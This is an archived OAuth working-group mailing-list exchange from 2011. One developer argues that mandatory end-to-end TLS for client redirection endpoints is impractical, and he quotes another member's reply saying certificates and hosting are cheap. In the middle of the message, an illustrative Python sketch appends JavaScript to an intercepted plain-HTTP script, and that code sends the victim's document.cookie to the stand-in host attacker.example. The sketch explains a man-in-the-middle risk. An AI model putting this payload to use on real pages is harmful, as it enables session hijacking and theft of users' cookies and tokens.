<one long rant adding no value to this conversation>

Speaking from current, ongoing, firsthand experience building an OAuth 2.0 
server and client.

Your questions about deploying TLS touch on the least significant obstacles to 
deploying a TLS-based client. I know these are the standard arguments people 
make when defending a requirement to use TLS, but in practice they are almost 
meaningless.

The problem is that no modern web application is built and deployed using a 
single provider or served from a single server (or servers controlled by a 
single entity). Take any popular blog, for example, and you'll find at least 5 
add-ons hosted by other services and loaded by the client: an analytics tool, 
one or more ad networks, some site navigation components, hosted comments, and 
on and on.

If *any* of the scripts loaded by the client at any time during an 
authenticated session is not using TLS, not only will the browser show a 
scary UX warning about the incomplete HTTPS state, but a MITM will also be 
able, with exactly the same ease, to hijack the session, just like the attack 
raised here. If the client is a JS-based OAuth client, add to that the theft 
of the in-memory access token.
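To make the mechanics concrete, here is an illustrative Python sketch (all names and URLs are hypothetical, and this is the core transformation, not a working proxy) of what a MITM can do to any script fetched over plain HTTP during an otherwise-HTTPS session:

```python
# Illustrative sketch: what a man-in-the-middle can do to any script
# fetched over plain HTTP during an authenticated session. All names
# and URLs here are hypothetical.

# JavaScript payload the attacker appends. Once it runs in the page, it
# has the same authority as the site's own code: it can read cookies and
# any in-memory access token and ship them off-site.
EXFIL_JS = (
    "new Image().src='http://attacker.example/steal?c='"
    "+encodeURIComponent(document.cookie);"
)

def tamper_with_script(intercepted_body: str) -> str:
    """Return the intercepted script with the attacker's payload appended.

    Because the script traveled over plain HTTP, nothing detects the
    modification; the browser executes the result with full page authority.
    """
    return intercepted_body + "\n" + EXFIL_JS

# Example: the victim's page loads http://cdn.example/analytics.js
original = "function trackPageView(){/* legitimate analytics code */}"
delivered = tamper_with_script(original)
assert EXFIL_JS in delivered  # the attacker's code now runs in-page
```

One plaintext script tag is enough; the browser grants the tampered script the same privileges as everything that did arrive over TLS.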

TLS performance sucks!

No, I'm not talking about the technology - I'm talking about the kind deployed 
widely on the web. There are no widely available CDNs for TLS at the same price 
and performance as there are for HTTP. It is still hard to impossible to find 
high-performance free TLS hosts for the most popular JS toolkits like jQuery 
and YUI. Loading these (big) script packages from the TLS servers that are 
available is simply too slow to be usable in any practical web application. 
Ads are another major issue.

I've spent the past three months building an OAuth 2.0 client. I've gone 
through the same analysis and realized that I had to use TLS end-to-end in 
order to protect the MAC secret issued to the client with its access token. 
This has caused significant pain, as we had to figure out solutions for every 
third-party service or script we use. We had to give up on the analytics 
package we wanted because they didn't have a fast enough solution for TLS-based 
pages (it works great for content sites where there isn't a lot of fast 
interaction or reliance on 'onload' activity).

I can go on for hours. This has been an awful experience, and not for a minute 
because of paying $100 for a cert or installing it in nginx. That took less 
than an hour.

I'm tired of having arguments with people quoting theories. I work in the real 
world, and the real world is just not ready for end-to-end TLS deployment. 
Maybe it's sad, but that's life. No one wants to put users at risk, but the 
only way to eliminate that risk entirely is to shut the web down.

This debate is just like talking about highway safety. We know how to make 
driving 100% safe: everyone will drive tanks at no faster than 10mph, or 
alternatively, no one will drive and we'll all climb onto conveyor belts to get 
anywhere (each of us bubble-wrapped and put into a medically induced coma to 
make sure we don't move around). But in the real world, practical 
considerations trump 100% guarantees.

By just offering services online you put users at some risk. If you want 100% 
safe online banking, just don't offer any.

We must do better, and we should push security as hard as we can. But if you 
push beyond what is currently reasonable, you will get nowhere and maybe even 
do more harm. Facebook, Google, Yahoo, Kiva, etc. can easily force our 
developers to use TLS for the redirection endpoint. And the developers who 
really want to use our services will figure out how to deploy TLS and get it 
working. But as soon as these developers try to use other services not ready 
for end-to-end TLS, the result will be a poor user experience.

In other words, no one will use those clients - they will suck.

It will be the safest web no one ever uses.

Awesome!

EHL


From: Francisco Corella [mailto:fcore...@pomcor.com]
Sent: Monday, April 04, 2011 5:35 PM
To: Eran Hammer-Lahav; Skylar Woodward; Phil Hunt; Oleg Gryb; David Recordon
Cc: OAuth WG
Subject: Re: [OAUTH-WG] Authorization code security issue (reframed)

David,

> If this is changed to a MUST, Facebook will be in violation of the
> specification moving forward. It is untenable to require all of our
> *client* developers to implement TLS endpoints though we certainly
> support developers who wish to do so. This is very different than
> offering our entire API (and now site as opt-in) over TLS as the
> server.

Why is it untenable?  Is it because of the cost of a
certificate?  Many CAs offer certificates for less than $100,
and there are free certificates.  See
http://en.wikipedia.org/wiki/Comparison_of_SSL_certificates_for_web_servers.
Is it because of the cost of hosting an SSL site?  You can
have your own virtual server at Amazon for $14 a month.  Is
it because of the inconvenience of having to spend a few
hours getting a certificate and adding SSL to your site?

And how about putting your users and your data at risk?  Is
that tenable?

Francisco


_______________________________________________
OAuth mailing list
OAuth@ietf.org
https://www.ietf.org/mailman/listinfo/oauth
